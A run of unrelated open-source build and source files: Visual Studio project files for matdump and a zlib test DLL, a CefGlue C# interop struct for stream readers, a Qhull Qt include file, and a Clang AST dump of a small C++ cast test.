EnableIntrinsicFunctions="true" AdditionalIncludeDirectories="&quot;$(SolutionDir)&quot;;&quot;$(SolutionDir)/../getopt&quot;;&quot;$(SolutionDir)/../src&quot;" PreprocessorDefinitions="_CRT_SECURE_NO_WARNINGS;REPLACE_GETOPT" RuntimeLibrary="2" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool 
Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="1" AdditionalLibraryDirectories="$(SolutionDir)$(ConfigurationName)" EnableUAC="false" GenerateDebugInformation="false" SubSystem="1" OptimizeReferences="2" EnableCOMDATFolding="2" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Release|x64" OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" IntermediateDirectory="$(PlatformName)\$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" WholeProgramOptimization="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" TargetEnvironment="3" /> <Tool Name="VCCLCompilerTool" Optimization="2" EnableIntrinsicFunctions="true" PreprocessorDefinitions="_CRT_SECURE_NO_WARNINGS;REPLACE_GETOPT" RuntimeLibrary="2" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="1" AdditionalLibraryDirectories="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" GenerateDebugInformation="true" SubSystem="1" OptimizeReferences="2" EnableCOMDATFolding="2" TargetMachine="17" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> </Configurations> <References> </References> <Files> <Filter Name="Source Files" 
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx" UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" > <File RelativePath="..\..\getopt\getopt_long.c" > </File> <File RelativePath="..\..\tools\matdump.c" > </File> </Filter> <Filter Name="Header Files" Filter="h;hpp;hxx;hm;inl;inc;xsd" UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" > <File RelativePath="..\..\getopt\getopt.h" > </File> </Filter> <Filter Name="Resource Files" Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav" UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}" > </Filter> </Files> <Globals> </Globals> </VisualStudioProject>
{ "pile_set_name": "Github" }
// // DO NOT MODIFY! THIS IS AUTOGENERATED FILE! // namespace Xilium.CefGlue.Interop { using System; using System.Diagnostics.CodeAnalysis; using System.Runtime.InteropServices; using System.Security; [StructLayout(LayoutKind.Sequential, Pack = libcef.ALIGN)] [SuppressMessage("Microsoft.Design", "CA1049:TypesThatOwnNativeResourcesShouldBeDisposable")] internal unsafe struct cef_stream_reader_t { internal cef_base_ref_counted_t _base; internal IntPtr _read; internal IntPtr _seek; internal IntPtr _tell; internal IntPtr _eof; internal IntPtr _may_block; // CreateForFile [DllImport(libcef.DllName, EntryPoint = "cef_stream_reader_create_for_file", CallingConvention = libcef.CEF_CALL)] public static extern cef_stream_reader_t* create_for_file(cef_string_t* fileName); // CreateForData [DllImport(libcef.DllName, EntryPoint = "cef_stream_reader_create_for_data", CallingConvention = libcef.CEF_CALL)] public static extern cef_stream_reader_t* create_for_data(void* data, UIntPtr size); // CreateForHandler [DllImport(libcef.DllName, EntryPoint = "cef_stream_reader_create_for_handler", CallingConvention = libcef.CEF_CALL)] public static extern cef_stream_reader_t* create_for_handler(cef_read_handler_t* handler); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate void add_ref_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int release_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int has_one_ref_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int has_at_least_one_ref_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private 
delegate UIntPtr read_delegate(cef_stream_reader_t* self, void* ptr, UIntPtr size, UIntPtr n); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int seek_delegate(cef_stream_reader_t* self, long offset, int whence); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate long tell_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int eof_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int may_block_delegate(cef_stream_reader_t* self); // AddRef private static IntPtr _p0; private static add_ref_delegate _d0; public static void add_ref(cef_stream_reader_t* self) { add_ref_delegate d; var p = self->_base._add_ref; if (p == _p0) { d = _d0; } else { d = (add_ref_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(add_ref_delegate)); if (_p0 == IntPtr.Zero) { _d0 = d; _p0 = p; } } d(self); } // Release private static IntPtr _p1; private static release_delegate _d1; public static int release(cef_stream_reader_t* self) { release_delegate d; var p = self->_base._release; if (p == _p1) { d = _d1; } else { d = (release_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(release_delegate)); if (_p1 == IntPtr.Zero) { _d1 = d; _p1 = p; } } return d(self); } // HasOneRef private static IntPtr _p2; private static has_one_ref_delegate _d2; public static int has_one_ref(cef_stream_reader_t* self) { has_one_ref_delegate d; var p = self->_base._has_one_ref; if (p == _p2) { d = _d2; } else { d = (has_one_ref_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(has_one_ref_delegate)); if (_p2 == IntPtr.Zero) { _d2 = d; _p2 = p; } } return d(self); } // HasAtLeastOneRef private static IntPtr _p3; private static has_at_least_one_ref_delegate _d3; 
public static int has_at_least_one_ref(cef_stream_reader_t* self) { has_at_least_one_ref_delegate d; var p = self->_base._has_at_least_one_ref; if (p == _p3) { d = _d3; } else { d = (has_at_least_one_ref_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(has_at_least_one_ref_delegate)); if (_p3 == IntPtr.Zero) { _d3 = d; _p3 = p; } } return d(self); } // Read private static IntPtr _p4; private static read_delegate _d4; public static UIntPtr read(cef_stream_reader_t* self, void* ptr, UIntPtr size, UIntPtr n) { read_delegate d; var p = self->_read; if (p == _p4) { d = _d4; } else { d = (read_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(read_delegate)); if (_p4 == IntPtr.Zero) { _d4 = d; _p4 = p; } } return d(self, ptr, size, n); } // Seek private static IntPtr _p5; private static seek_delegate _d5; public static int seek(cef_stream_reader_t* self, long offset, int whence) { seek_delegate d; var p = self->_seek; if (p == _p5) { d = _d5; } else { d = (seek_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(seek_delegate)); if (_p5 == IntPtr.Zero) { _d5 = d; _p5 = p; } } return d(self, offset, whence); } // Tell private static IntPtr _p6; private static tell_delegate _d6; public static long tell(cef_stream_reader_t* self) { tell_delegate d; var p = self->_tell; if (p == _p6) { d = _d6; } else { d = (tell_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(tell_delegate)); if (_p6 == IntPtr.Zero) { _d6 = d; _p6 = p; } } return d(self); } // Eof private static IntPtr _p7; private static eof_delegate _d7; public static int eof(cef_stream_reader_t* self) { eof_delegate d; var p = self->_eof; if (p == _p7) { d = _d7; } else { d = (eof_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(eof_delegate)); if (_p7 == IntPtr.Zero) { _d7 = d; _p7 = p; } } return d(self); } // MayBlock private static IntPtr _p8; private static may_block_delegate _d8; public static int may_block(cef_stream_reader_t* self) { may_block_delegate d; var p = 
self->_may_block; if (p == _p8) { d = _d8; } else { d = (may_block_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(may_block_delegate)); if (_p8 == IntPtr.Zero) { _d8 = d; _p8 = p; } } return d(self); } } }
{ "pile_set_name": "Github" }
# ------------------------------------------------- # qhull-libqhull-src_r.pri -- Qt include project for libqhull_r sources and headers # # It uses reentrant Qhull # ------------------------------------------------- # Order object files by frequency of execution. Small files at end. # Current directory is caller # libqhull_r/libqhull_r.pro and ../qhull-libqhull-src_r.pri have the same SOURCES and HEADERS SOURCES += ../libqhull_r/global_r.c SOURCES += ../libqhull_r/stat_r.c SOURCES += ../libqhull_r/geom2_r.c SOURCES += ../libqhull_r/poly2_r.c SOURCES += ../libqhull_r/merge_r.c SOURCES += ../libqhull_r/libqhull_r.c SOURCES += ../libqhull_r/geom_r.c SOURCES += ../libqhull_r/poly_r.c SOURCES += ../libqhull_r/qset_r.c SOURCES += ../libqhull_r/mem_r.c SOURCES += ../libqhull_r/random_r.c SOURCES += ../libqhull_r/usermem_r.c SOURCES += ../libqhull_r/userprintf_r.c SOURCES += ../libqhull_r/io_r.c SOURCES += ../libqhull_r/user_r.c SOURCES += ../libqhull_r/rboxlib_r.c SOURCES += ../libqhull_r/userprintf_rbox_r.c HEADERS += ../libqhull_r/geom_r.h HEADERS += ../libqhull_r/io_r.h HEADERS += ../libqhull_r/libqhull_r.h HEADERS += ../libqhull_r/mem_r.h HEADERS += ../libqhull_r/merge_r.h HEADERS += ../libqhull_r/poly_r.h HEADERS += ../libqhull_r/random_r.h HEADERS += ../libqhull_r/qhull_ra.h HEADERS += ../libqhull_r/qset_r.h HEADERS += ../libqhull_r/stat_r.h HEADERS += ../libqhull_r/user_r.h
{ "pile_set_name": "Github" }
<"TranslationUnitDecl" : ( { "pointer" : 1, "source_range" : ( { }, { } ) }, [ <"TypedefDecl" : ( { "pointer" : 2, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__int128_t", "qual_name" : [ "__int128_t" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 3, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__uint128_t", "qual_name" : [ "__uint128_t" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 4, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__NSConstantString", "qual_name" : [ "__NSConstantString" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 5, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__builtin_ms_va_list", "qual_name" : [ "__builtin_ms_va_list" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 6, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__builtin_va_list", "qual_name" : [ "__builtin_va_list" ] }, 0, { } )>, <"VarDecl" : ( { "pointer" : 7, "source_range" : ( { "file" : "tests/c_cast.cpp", "line" : 7, "column" : 1 }, { "column" : 9 } ), "is_used" : true, "is_this_declaration_referenced" : true }, { "name" : "i", "qual_name" : [ "i" ] }, { "type_ptr" : 8 }, { "is_global" : true, "init_expr" : <"IntegerLiteral" : ( { "pointer" : 9, "source_range" : ( { "column" : 9 }, { "column" : 9 } ) }, [ ], { "qual_type" : { "type_ptr" : 8 } }, { "is_signed" : true, "bitwidth" : 32, "value" : "10" } )> } )>, <"VarDecl" : ( { "pointer" : 10, "source_range" : ( { "line" : 8, "column" : 1 }, { "column" : 16 } ) }, { "name" : "l", "qual_name" : [ "l" ] }, { "type_ptr" : 11 }, { "is_global" : true, "init_expr" : <"CStyleCastExpr" : ( { "pointer" : 12, "source_range" : ( { "column" : 10 }, { "column" : 16 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 13, "source_range" : ( { "column" : 16 }, { "column" : 16 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 14, "source_range" : ( { "column" : 16 }, { "column" : 16 } ) }, [ <"DeclRefExpr" : ( { "pointer" : 15, "source_range" : 
( { "column" : 16 }, { "column" : 16 } ) }, [ ], { "qual_type" : { "type_ptr" : 8 }, "value_kind" : <"LValue"> }, { "decl_ref" : { "kind" : <"Var">, "decl_pointer" : 7, "name" : { "name" : "i", "qual_name" : [ "i" ] }, "qual_type" : { "type_ptr" : 8 } } } )> ], { "qual_type" : { "type_ptr" : 8 } }, { "cast_kind" : <"LValueToRValue">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"IntegralCast">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"NoOp">, "base_path" : [ ] }, { "type_ptr" : 11 } )> } )>, <"VarDecl" : ( { "pointer" : 16, "source_range" : ( { "line" : 9, "column" : 1 }, { "column" : 16 } ) }, { "name" : "m", "qual_name" : [ "m" ] }, { "type_ptr" : 11 }, { "is_global" : true, "init_expr" : <"CXXFunctionalCastExpr" : ( { "pointer" : 17, "source_range" : ( { "column" : 10 }, { "column" : 16 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 18, "source_range" : ( { "column" : 15 }, { "column" : 15 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 19, "source_range" : ( { "column" : 15 }, { "column" : 15 } ) }, [ <"DeclRefExpr" : ( { "pointer" : 20, "source_range" : ( { "column" : 15 }, { "column" : 15 } ) }, [ ], { "qual_type" : { "type_ptr" : 8 }, "value_kind" : <"LValue"> }, { "decl_ref" : { "kind" : <"Var">, "decl_pointer" : 7, "name" : { "name" : "i", "qual_name" : [ "i" ] }, "qual_type" : { "type_ptr" : 8 } } } )> ], { "qual_type" : { "type_ptr" : 8 } }, { "cast_kind" : <"LValueToRValue">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"IntegralCast">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"NoOp">, "base_path" : [ ] }, { "type_ptr" : 11 } )> } )>, <"TypedefDecl" : ( { "pointer" : 21, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "instancetype", "qual_name" : [ "instancetype" ] }, 22, { } )> ], { }, { "input_path" : "tests/c_cast.cpp", "input_kind" : <"IK_CXX">, "integer_type_widths" : { 
"char_type" : 8, "short_type" : 16, "int_type" : 32, "long_type" : 64, "longlong_type" : 64 }, "types" : [ <"BuiltinType" : ( { "pointer" : 23 }, <"Void"> )>, <"BuiltinType" : ( { "pointer" : 24 }, <"Bool"> )>, <"BuiltinType" : ( { "pointer" : 25 }, <"Char_S"> )>, <"BuiltinType" : ( { "pointer" : 26 }, <"SChar"> )>, <"BuiltinType" : ( { "pointer" : 27 }, <"Short"> )>, <"BuiltinType" : ( { "pointer" : 8 }, <"Int"> )>, <"BuiltinType" : ( { "pointer" : 11 }, <"Long"> )>, <"BuiltinType" : ( { "pointer" : 28 }, <"LongLong"> )>, <"BuiltinType" : ( { "pointer" : 29 }, <"UChar"> )>, <"BuiltinType" : ( { "pointer" : 30 }, <"UShort"> )>, <"BuiltinType" : ( { "pointer" : 31 }, <"UInt"> )>, <"BuiltinType" : ( { "pointer" : 32 }, <"ULong"> )>, <"BuiltinType" : ( { "pointer" : 33 }, <"ULongLong"> )>, <"BuiltinType" : ( { "pointer" : 34 }, <"Float"> )>, <"BuiltinType" : ( { "pointer" : 35 }, <"Double"> )>, <"BuiltinType" : ( { "pointer" : 36 }, <"LongDouble"> )>, <"BuiltinType" : ( { "pointer" : 37 }, <"Float128"> )>, <"BuiltinType" : ( { "pointer" : 38 }, <"Float16"> )>, <"BuiltinType" : ( { "pointer" : 39 }, <"ShortAccum"> )>, <"BuiltinType" : ( { "pointer" : 40 }, <"Accum"> )>, <"BuiltinType" : ( { "pointer" : 41 }, <"LongAccum"> )>, <"BuiltinType" : ( { "pointer" : 42 }, <"UShortAccum"> )>, <"BuiltinType" : ( { "pointer" : 43 }, <"UAccum"> )>, <"BuiltinType" : ( { "pointer" : 44 }, <"ULongAccum"> )>, <"BuiltinType" : ( { "pointer" : 45 }, <"ShortFract"> )>, <"BuiltinType" : ( { "pointer" : 46 }, <"Fract"> )>, <"BuiltinType" : ( { "pointer" : 47 }, <"LongFract"> )>, <"BuiltinType" : ( { "pointer" : 48 }, <"UShortFract"> )>, <"BuiltinType" : ( { "pointer" : 49 }, <"UFract"> )>, <"BuiltinType" : ( { "pointer" : 50 }, <"ULongFract"> )>, <"BuiltinType" : ( { "pointer" : 51 }, <"SatShortAccum"> )>, <"BuiltinType" : ( { "pointer" : 52 }, <"SatAccum"> )>, <"BuiltinType" : ( { "pointer" : 53 }, <"SatLongAccum"> )>, <"BuiltinType" : ( { "pointer" : 54 }, <"SatUShortAccum"> )>, 
<"BuiltinType" : ( { "pointer" : 55 }, <"SatUAccum"> )>, <"BuiltinType" : ( { "pointer" : 56 }, <"SatULongAccum"> )>, <"BuiltinType" : ( { "pointer" : 57 }, <"SatShortFract"> )>, <"BuiltinType" : ( { "pointer" : 58 }, <"SatFract"> )>, <"BuiltinType" : ( { "pointer" : 59 }, <"SatLongFract"> )>, <"BuiltinType" : ( { "pointer" : 60 }, <"SatUShortFract"> )>, <"BuiltinType" : ( { "pointer" : 61 }, <"SatUFract"> )>, <"BuiltinType" : ( { "pointer" : 62 }, <"SatULongFract"> )>, <"BuiltinType" : ( { "pointer" : 63 }, <"Int128"> )>, <"BuiltinType" : ( { "pointer" : 64 }, <"UInt128"> )>, <"BuiltinType" : ( { "pointer" : 65 }, <"WChar_S"> )>, <"BuiltinType" : ( { "pointer" : 66 }, <"Char8"> )>, <"BuiltinType" : ( { "pointer" : 67 }, <"Char16"> )>, <"BuiltinType" : ( { "pointer" : 68 }, <"Char32"> )>, <"BuiltinType" : ( { "pointer" : 69 }, <"Dependent"> )>, <"BuiltinType" : ( { "pointer" : 70 }, <"Overload"> )>, <"BuiltinType" : ( { "pointer" : 71 }, <"BoundMember"> )>, <"BuiltinType" : ( { "pointer" : 72 }, <"PseudoObject"> )>, <"BuiltinType" : ( { "pointer" : 73 }, <"UnknownAny"> )>, <"BuiltinType" : ( { "pointer" : 74 }, <"ARCUnbridgedCast"> )>, <"BuiltinType" : ( { "pointer" : 75 }, <"BuiltinFn"> )>, <"ComplexType" : ( { "pointer" : 76 } )>, <"ComplexType" : ( { "pointer" : 77 } )>, <"ComplexType" : ( { "pointer" : 78 } )>, <"ComplexType" : ( { "pointer" : 79 } )>, <"BuiltinType" : ( { "pointer" : 80 }, <"ObjCId"> )>, <"BuiltinType" : ( { "pointer" : 81 }, <"ObjCClass"> )>, <"BuiltinType" : ( { "pointer" : 82 }, <"ObjCSel"> )>, <"PointerType" : ( { "pointer" : 83 }, { "type_ptr" : 23 } )>, <"BuiltinType" : ( { "pointer" : 84 }, <"NullPtr"> )>, <"BuiltinType" : ( { "pointer" : 85 }, <"Half"> )>, <"RecordType" : ( { "pointer" : 86 }, 87 )>, <"PointerType" : ( { "pointer" : 88 }, { "type_ptr" : 8, "is_const" : true } )>, <"PointerType" : ( { "pointer" : 89 }, { "type_ptr" : 25, "is_const" : true } )>, <"PointerType" : ( { "pointer" : 90 }, { "type_ptr" : 25 } )>, <"RecordType" 
: ( { "pointer" : 91 }, 92 )>, <"ConstantArrayType" : ( { "pointer" : 93 }, { "element_type" : { "type_ptr" : 91 }, "stride" : 24 }, 1 )>, <"ObjCObjectType" : ( { "pointer" : 94 }, { "base_type" : 80 } )>, <"ObjCObjectPointerType" : ( { "pointer" : 95 }, { "type_ptr" : 94 } )>, <"TypedefType" : ( { "pointer" : 96, "desugared_type" : 95 }, { "child_type" : { "type_ptr" : 95 }, "decl_ptr" : 97 } )>, <"TypedefType" : ( { "pointer" : 22, "desugared_type" : 95 }, { "child_type" : { "type_ptr" : 96 }, "decl_ptr" : 21 } )>, <"NoneType" : ( { "pointer" : 0 } )> ] } )>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ItemGroup Label="ProjectConfigurations"> <ProjectConfiguration Include="Debug|Itanium"> <Configuration>Debug</Configuration> <Platform>Itanium</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Debug|Win32"> <Configuration>Debug</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Debug|x64"> <Configuration>Debug</Configuration> <Platform>x64</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|Itanium"> <Configuration>Release</Configuration> <Platform>Itanium</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|Win32"> <Configuration>Release</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|x64"> <Configuration>Release</Configuration> <Platform>x64</Platform> </ProjectConfiguration> </ItemGroup> <PropertyGroup Label="Globals"> <ProjectGuid>{C52F9E7B-498A-42BE-8DB4-85A15694366A}</ProjectGuid> <Keyword>Win32Proj</Keyword> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>Unicode</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" 
Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <ImportGroup Label="ExtensionSettings"> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> <Import 
Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <PropertyGroup Label="UserMacros" /> <PropertyGroup> <_ProjectFileVersion>10.0.30128.1</_ProjectFileVersion> <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">x86\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">x86\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">x86\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">x86\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">x64\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">x64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">ia64\TestZlibDll$(Configuration)\</OutDir> <IntDir 
Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">ia64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">true</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">x64\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">x64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">ia64\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">ia64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">false</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">false</GenerateManifest> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" /> <CodeAnalysisRuleAssemblies 
